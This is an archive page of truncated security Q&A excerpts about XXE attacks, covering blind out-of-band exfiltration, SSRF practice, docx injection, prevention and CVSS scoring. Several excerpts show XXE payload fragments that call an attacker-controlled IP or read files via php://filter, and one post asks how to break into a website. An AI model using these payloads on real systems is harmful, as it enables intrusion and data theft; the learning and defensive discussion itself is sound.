xxe – Page 2 – WindowsTechs.com

Is it possible to exploit XXE data exfiltration with 1 GET request?

Posted on March 26, 2021 by Maicake

I have a blind XXE through parameter entities. The payload I used to test it is the following.
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://myip"> %xxe; ]>

I receive a GET request. Next move I tried was serving thi… Continue reading Is it possible to exploit XXE data exfiltration with 1 GET request?→

Blind XXE – Exfiltration Data via OOB

Posted on March 1, 2021 by Zefiro38

My lab

Kali Linux:192.168.171.134
bWApp Server: http://192.168.171.131

I want to do an exfiltration data via HTTP on this Blind XXE.
I’ll use the Portswigger Payload.
This is the External.DTD:

<!ENTITY % eval "<!ENTITY &a… Continue reading Blind XXE – Exfiltration Data via OOB→

how to hack a website with login [closed]

Posted on February 2, 2021 by Noah-felix

I am new on pentest and I do not know if is possible to invade a website with this http route-to="/admin/"
If it is possible, I need use sqli, xss or xxe, what I need to hack this website and how I use the sqli, xss or xxe?

… Continue reading how to hack a website with login [closed]→

XXE SSRF Practice

Posted on January 27, 2021 by user1166155

I’m trying to implement a simple demo – to better understand XXE and SSRF techniques.
I have written these two files below in an attempt to set this up.
I currently intercept the AJAX POST request and modify the data (params) by appending:… Continue reading XXE SSRF Practice→

XXE with OOB data exfiltration

Posted on October 1, 2020 by Maicake

SCENARIO:
I successfully tried to send a request to the burp collaborator, then the application is vulnerable to SSRF through blind XXE. The payload I used is the following
<?xml version="1.0" encoding="utf-8"?>
… Continue reading XXE with OOB data exfiltration→

PHP Blind XXE Exploitation: Invalid URI in Entity

Posted on July 14, 2020 by user3207874

When attempting to exploit blind XXE as explained in this article, I got an error in my apache logs:
PHP Warning: DOMDocument::loadXML(): Invalid URI: http://192.168.6.1/82a3ccab632c in Entity
The DTD file:
<!ENTITY % payload SYSTEM &q… Continue reading PHP Blind XXE Exploitation: Invalid URI in Entity→

Prevent XXE attack by preprocessing XML

Posted on June 14, 2020 by John Donn

I have an old project which parses XML files coming from an external origin, so it is at least in principle vulnerable to XXE.

It is difficult to update the project to use newer versions of XML libraries, which can be configured to preven… Continue reading Prevent XXE attack by preprocessing XML→

XXE – possible to read directories?

Posted on June 5, 2020 by pee2pee

I have come across XXE on a CTF a while ago and I can’t get my head around where to go from where I am.

<?xml version=”1.0″ encoding=”ISO-8859-1″?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM “php://filter/convert.base64-encode/resourc… Continue reading XXE – possible to read directories?→

XXE Injection in docx: entity not defined

Posted on April 28, 2020 by Sorokine

My goal is to create a docx file that, when uploaded to a server and parsed there, causes the parser to fetch my url so I know it worked.

Unfortunately, I only have Libre Office and not MS Office at my hands. When I open the file with Lib… Continue reading XXE Injection in docx: entity not defined→

Deciding CVSS v3.1 scope parameter for a XXE vulnerability

Posted on April 22, 2020 by NShani

I have a web application which is vulnerable to XXE attack. The impact of this vulnerability is, it can do a port scan by sending a malicious XML that does a request to a specific host+port in the server instance/network.

When calculatin… Continue reading Deciding CVSS v3.1 scope parameter for a XXE vulnerability→